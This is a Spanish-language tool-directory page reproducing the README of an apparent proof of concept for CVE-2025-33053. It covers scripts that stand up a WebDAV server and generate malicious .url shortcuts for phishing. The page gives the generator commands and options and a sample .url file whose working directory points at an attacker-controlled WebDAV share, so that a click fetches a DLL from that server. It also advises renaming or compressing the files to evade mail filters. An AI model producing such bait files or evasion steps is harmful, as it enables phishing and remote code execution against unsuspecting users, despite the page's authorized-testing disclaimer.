Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 Prueba de concepto (PoC) | Kitploit
Herramientas/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Generación de PayloadsExplotaciónMovimiento LateralPhishingSeguridad WebPruebas de PenetraciónComando y ControlIngeniería SocialRed Teaming
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Prueba de concepto (PoC)

Ver Repositorio
641613hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-33053 Prueba de Concepto

Este repositorio proporciona scripts para desplegar automáticamente un servidor WebDAV en Ubuntu usando Apache2 y generar archivos .url maliciosos para su uso en phishing, red teaming o simulación de movimiento lateral.


📁 Contenido

  • setup_webdav.sh – Script Bash para configurar Apache2 + WebDAV.
  • setup_webdav.py – Versión en Python del anterior.
  • gen_url.py – Script en Python para generar archivos de acceso directo .url con rutas UNC/WebDAV.
  • README.md – Documentación.

🔧 Requisitos

  • SO: Ubuntu 20.04 o posterior (compatible con Debian)
  • Privilegios de root (sudo)
  • Python 3.x

🚀 Instrucciones de Configuración

1. Servidor WebDAV (mediante Bash)

sudo bash setup_webdav.sh

O usando Python:

sudo python3 setup_webdav.py

Por defecto, el script:

  • Instala Apache y los módulos WebDAV necesarios.
  • Crea un directorio compartido en /var/www/webdav.
  • Habilita los módulos DAV y DAV_FS.
  • Crea un directorio DavLockDB (para evitar errores de bloqueo DAV de Apache).
  • Reinicia el servicio Apache.

📎 Ruta WebDAV: http://<your-ip>/webdav/


💣 Generando un Acceso Directo .url Malicioso

Ejemplo de uso:

python3 gen_url.py --ip 192.168.1.100 --out doc.url

Todas las opciones:

python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(Default: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

Esto creará un archivo .url como:

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 Al hacer clic en este archivo (en ciertas configuraciones), el sistema objetivo podría conectarse automáticamente a tu servidor WebDAV (autenticación o entrega de DLL).


🔒 Notas para Pruebas de Seguridad

  • Desactiva el firewall (o abre el puerto 80) si estás probando en una red local:
    sudo ufw allow 80
    
  • Los archivos .url pueden no ejecutarse como se espera dependiendo de:
    • Restricciones de directivas de grupo
    • Aplicaciones predeterminadas
    • Cliente de correo (Gmail puede sanearlos)
  • Puede que necesites comprimir o renombrar .url a .txt para evadir filtros.

⚠️ Aviso Legal

Este repositorio es solo para fines educativos y pruebas de penetración autorizadas.
No uses estos scripts contra sistemas que no te pertenezcan o para los que no tengas permiso de prueba.


🧠 Referencias

  • Configuración del servidor WebDAV - LinuxConfig.org
  • Configuración de WebDAV en Apache - Peter Girnus
  • Documentación de Microsoft WebDAV

📬 Contacto

Para preguntas o solicitudes éticas de red teaming, contacta a través de los issues de GitHub.

Descargar herramienta